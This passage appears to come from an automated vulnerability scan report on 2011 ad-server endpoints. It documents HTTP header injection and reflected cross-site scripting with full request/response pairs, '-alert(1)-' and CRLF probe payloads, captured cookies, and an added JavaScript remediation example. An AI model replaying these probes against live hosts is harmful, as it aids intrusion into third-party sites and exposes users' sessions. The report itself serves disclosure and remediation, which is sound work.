Location: http://static.2mdn.net/334dd
6d942ec9952
/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http: //www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656
Date: Mon, 09 May 2011 14:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 48d26%0d%0a5aaccec468c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480?&48d26%0d%0a5aaccec468c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;;48d26
5aaccec468c
=1;~cs=i:
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1011

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload c5c12%0d%0a7e45a7ac1ac was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=c5c12%0d%0a7e45a7ac1ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:01:07 GMT
Expires: Mon, 09 May 2011 14:01:07 GMT
DCLK_imp: v7;x;44306;0-0;0;60840454;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=c5c12
7e45a7ac1ac
;~cs=b:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/a;44306;0-0;0;60840454;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3. Cross-site scripting (reflected)
There are 147 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 950fa'-alert(1)-'706392fff78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
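The response above, and every other adj response in this section, builds a second script tag by concatenating request-derived path segments and parameters into a single-quoted JavaScript string that the browser then writes into the page as HTML. The block below is an added example, not the ad server's code: it rebuilds that template (simplified) as a function, places a hardened builder beside it, and includes a small tokenizer that tells the two apart by checking whether the probe ends up outside a string literal. Hostnames, parameter names and the probe value come from finding 3.1; every function and constant name is this example's own, as is the assumption that nothing after the `?` needs to be echoed.

```javascript
'use strict';

// Added example, not code from the scanned site. Rebuilds the document.write()
// template seen in the adj responses (buildAdScriptUnsafe), puts a hardened
// builder beside it (buildAdScriptSafe) and adds a check that tells them apart.

// Vulnerable shape: request-derived values are concatenated into a
// single-quoted JS string literal that the browser later writes as HTML.
function buildAdScriptUnsafe(p) {
  return "document.write('<scr'+'ipt language=\"javascript\" " +
    "src=\"http://k.collective-media.net/cmadj/" + p.net + "/" + p.placement +
    ";tgt=" + p.tgt + ";sz=" + p.sz + ";ord=" + p.ord + p.rawQuery +
    ";'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + '?\">');";
}

// Layer 1: values with a known shape are allow-listed on arrival; a request
// that fails is refused (null here; a real server would answer 400).
const SIZE_RE = /^\d{1,4}x\d{1,4}$/;          // 300x600, 728x90, ...
const ORD_RE  = /^\d{1,16}$/;                  // cache-buster
const TGT_RE  = /^[A-Za-z0-9_]{0,32}$/;        // "brand" or empty

// Layer 2: encode for the output context. The segment lands inside a URL,
// inside an HTML attribute, inside a JS string literal. encodeURIComponent()
// alone is not enough: it leaves ' ( ) ! * ~ untouched, and the probe
// '-alert(1)-' used throughout this report consists of exactly those
// characters plus alphanumerics. Encoding them as well leaves only
// [A-Za-z0-9%._-], which is inert in all three contexts.
function encodeSegment(s) {
  return encodeURIComponent(String(s))
    .replace(/[!'()*~]/g, ch => '%' + ch.charCodeAt(0).toString(16).toUpperCase());
}

function buildAdScriptSafe(p) {
  if (!SIZE_RE.test(p.sz) || !ORD_RE.test(p.ord) || !TGT_RE.test(p.tgt)) return null;
  // The captured requests carry nothing after "?", so the query string is never
  // echoed; a key that was needed would be read by name and passed through
  // encodeSegment like the path segments (assumption about the server).
  return "document.write('<scr'+'ipt language=\"javascript\" " +
    "src=\"http://k.collective-media.net/cmadj/" + encodeSegment(p.net) + "/" +
    encodeSegment(p.placement) + ";tgt=" + p.tgt + ";sz=" + p.sz + ";ord=" + p.ord +
    ";'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + '?\">');";
}

// Verification: drop the contents of every '...' / "..." literal; whatever is
// left is code the browser would execute. If the probe's alert(1) survives,
// the input broke out of the string. Simplified tokenizer: the generated
// snippet contains no comments, regex or template literals.
function stripStringLiterals(src) {
  let out = '', quote = null;
  for (let i = 0; i < src.length; i++) {
    const ch = src[i];
    if (quote) {
      if (ch === '\\') { i++; continue; }        // skip the escaped character
      if (ch === quote) { quote = null; out += ch; }
      continue;
    }
    if (ch === "'" || ch === '"') quote = ch;
    out += ch;
  }
  return out;
}

function executesOutsideString(src, marker) {
  return stripStringLiterals(src).includes(marker);
}

// Probe from finding 3.1, placed in REST URL parameter 2 (the "net" segment).
const PROBE_31 = "950fa'-alert(1)-'706392fff78";
const REQUEST_31 = { net: 'cm.tribune' + PROBE_31, placement: 'uscell_ldev_300x600_05311',
                     tgt: 'brand', sz: '300x600', ord: '5044004', rawQuery: '' };

function demo() {
  const unsafe = buildAdScriptUnsafe(REQUEST_31);
  const safe = buildAdScriptSafe(REQUEST_31);
  return {
    unsafeBreaksOut: executesOutsideString(unsafe, 'alert(1)'),                 // true
    safeBreaksOut: safe !== null && executesOutsideString(safe, 'alert(1)'),    // false
    safeNet: encodeSegment(REQUEST_31.net),
    // A size that is not NNNxNNN (finding 3.8 put the probe there) is refused outright.
    badSizeRefused: buildAdScriptSafe({ ...REQUEST_31, sz: '300x250' + PROBE_31 }) === null, // true
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two points the check makes visible. First, this probe contains no character that encodeURIComponent() would touch, so a fix that only URL-encodes with the standard function would still fail finding 3.1. Second, because the response is served as application/x-javascript, the injected code runs in the origin of whichever page includes the URL in a script element, which is how ad tags are loaded; the breakout has to be judged against the publisher pages that build this URL (the Referer headers above show orlandosentinel.com and floridatoday.com doing so), not against a.collective-media.net alone.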

3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d0da'-alert(1)-'85703a87340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c672b'-alert(1)-'978317c40a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?&c672b'-alert(1)-'978317c40a6=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?&c672b'-alert(1)-'978317c40a6=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the tgt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4594'-alert(1)-'6008b1110f2 was submitted in the tgt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?d4594'-alert(1)-'6008b1110f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?d4594'-alert(1)-'6008b1110f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b5f'-alert(1)-'1057096941b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa51'-alert(1)-'50324ee319c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbffc'-alert(1)-'020bebcbb48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85f88'-alert(1)-'6ad97540a80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?85f88'-alert(1)-'6ad97540a80 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 14:00:23 GMT
Connection: close
Vary: Accept-Encoding
